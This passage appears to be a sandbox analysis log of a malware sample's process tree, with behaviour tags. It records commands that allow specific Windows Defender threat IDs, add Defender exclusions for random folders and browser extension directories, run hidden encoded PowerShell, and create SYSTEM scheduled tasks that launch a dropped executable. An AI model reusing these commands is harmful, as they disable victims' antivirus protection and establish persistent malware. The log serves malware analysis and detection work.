\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZmzskowerwXEonlG /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYrwmJrjJ" /SC once /ST 15:18:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYrwmJrjJ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYrwmJrjJ"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WKALCIrwIEiqhKBsn" /SC once /ST 12:40:23 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\GOqylmQ.exe\" y7 /TJxFdidMF 385118 /S" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WKALCIrwIEiqhKBsn"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 9922⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exeC:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\GOqylmQ.exeC:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\GOqylmQ.exe y7 /TJxFdidMF 385118 /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
